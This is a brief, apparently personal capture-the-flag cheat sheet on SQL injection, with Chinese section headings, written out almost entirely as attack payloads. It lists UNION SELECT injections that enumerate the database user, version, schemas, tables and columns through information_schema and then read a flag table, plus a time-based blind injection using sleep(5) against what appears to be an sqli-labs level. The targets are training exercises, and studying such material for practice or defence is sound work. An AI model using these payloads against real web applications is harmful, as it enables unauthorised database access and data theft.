sqlinjection

持续更新

基本的
?id=-1′ union select 1,2,concat_ws(char(32,32,32),user(),database(),version()) — –
?id=-1′ union select 1,2,group_concat(schema_name) from information_schema.schemata — –
?id=-1′ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”ctftraining”– –
?id=-1′ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=”flag”– –
?id=-1′ union select 1,2,group_concat(flag) from ctftraining.flag– –
Less-9/?id=1′ and sleep(5)–+

姿势
handler